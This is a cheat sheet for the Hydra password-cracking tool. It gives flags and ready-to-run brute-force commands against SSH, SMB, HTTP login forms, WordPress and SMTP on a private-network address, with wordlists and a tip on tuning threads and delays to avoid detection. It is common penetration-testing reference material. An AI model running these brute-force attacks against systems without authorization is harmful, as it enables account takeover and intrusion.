π οΈ Hydra Cheat Sheet
π‘ Hydra is a powerful password-cracking tool for brute-forcing authentication protocols. It supports various protocols and is highly customizable for complex scenarios.
π 1. Basic Syntax
hydra [options] <IP/Target> <protocol>
Examples:
- Brute-force SSH login with a single username and password list:
hydra -l admin -P passwords.txt 192.168.1.10 ssh - Brute-force HTTP POST login form:
hydra -l admin -P passwords.txt 192.168.1.10 http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid login"
π 2. Common Flags
| Flag | Description |
|---|---|
-h |
Display help menu. |
-l <user> |
Single username/login. |
-L <file> |
Wordlist for usernames. |
-p <pass> |
Single password. |
-P <file> |
Wordlist for passwords. |
-s <port> |
Specify target port. |
-f |
Stop after finding valid credentials. |
-R |
Restore previous session. |
-t <num> |
Number of parallel threads (default: 16). |
-V |
Verbose output (show each attempt). |
-I |
Ignore an existing restore file. |
-u |
Loop usernames with each password attempt. |
-w <sec> |
Wait seconds between retries. |
-o <file> |
Write found credentials to a file. |
π 3. Supported Protocols
Hydra supports a wide range of protocols, including:
- SSH
- FTP
- POP3
- HTTP-FORM-GET
- HTTP-FORM-POST
- HTTP-HEAD
- HTTP-POST
- HTTP-GET
- IMAP
- SMB
- SMTP
- MySQL
- Telnet
- VNC
- RDP
List all supported protocols:
hydra -U
π 4. Examples
π‘οΈ 4.1 SSH Brute-Force Attack
Single User, Password List:
hydra -l root -P rockyou.txt 192.168.1.10 ssh
Username List and Password List:
hydra -L users.txt -P passwords.txt 192.168.1.10 ssh
Specify Port and Threads:
hydra -L users.txt -P passwords.txt -s 2222 -t 10 192.168.1.10 ssh
π 4.2 SMB Brute-Force Attack
Enumerate SMB with credentials:
hydra -L users.txt -P passwords.txt 192.168.1.10 smb
With a specific port:
hydra -L users.txt -P passwords.txt -s 445 192.168.1.10 smb
π 4.3 HTTP POST Brute-Force
Simple HTTP POST Form:
hydra -l admin -P rockyou.txt 192.168.1.10 http-post-form \
"/login:username=^USER^&password=^PASS^:F=Invalid credentials"
Verbose Mode with Output File:
hydra -L users.txt -P passwords.txt -o results.txt -V 192.168.1.10 http-post-form \
"/login:username=^USER^&password=^PASS^:F=Invalid login"
π 4.4 WordPress Login Brute-Force
Target WordPress Login Page:
hydra -L users.txt -P passwords.txt -V 192.168.1.10 http-form-post \
"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:S=Location"
π§ 4.5 SMTP Brute-Force
Target SMTP Server (Port 25):
hydra -L users.txt -P passwords.txt -s 25 192.168.1.10 smtp
Secure SMTP (Port 465):
hydra -L users.txt -P passwords.txt -s 465 192.168.1.10 smtp -S
π 5. Advanced Techniques
π§ Session Management
- Save Progress and Restore Session:
hydra -L users.txt -P passwords.txt -R 192.168.1.10 ssh - Ignore Existing Restore File:
hydra -I -L users.txt -P passwords.txt 192.168.1.10 ssh
βοΈ Efficiency Optimization
- Adjust Threads:
hydra -t 64 -L users.txt -P passwords.txt 192.168.1.10 ssh - Add Delay Between Attempts:
hydra -L users.txt -P passwords.txt -w 1 192.168.1.10 ssh
π Custom User-Agent for HTTP Brute-Force
hydra -l admin -P passwords.txt 192.168.1.10 http-post-form \
"/login:username=^USER^&password=^PASS^:F=Incorrect login" \
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0)"
π 6. Output and Logging
- Save Results to a File:
hydra -L users.txt -P passwords.txt -o results.txt 192.168.1.10 ssh - Verbose Output:
hydra -V -L users.txt -P passwords.txt 192.168.1.10 ssh
π 7. Tips and Tricks
- Understand Target Forms: Inspect login forms with browser tools (
Inspect Element) to identify fields. - Use Small Wordlists First: Start with smaller wordlists for quick checks.
- Don’t Overload Targets: Be mindful of threads (
-t) and delays (-w) to avoid detection. - Handle Captchas & Rate-Limiting: Some targets may require special handling or custom scripts.
π 8. Documentation and Resources
- Official Hydra GitHub: Hydra GitHub Repository
- Hydra Manual:
man hydra - Kali Linux Documentation: Kali Tools - Hydra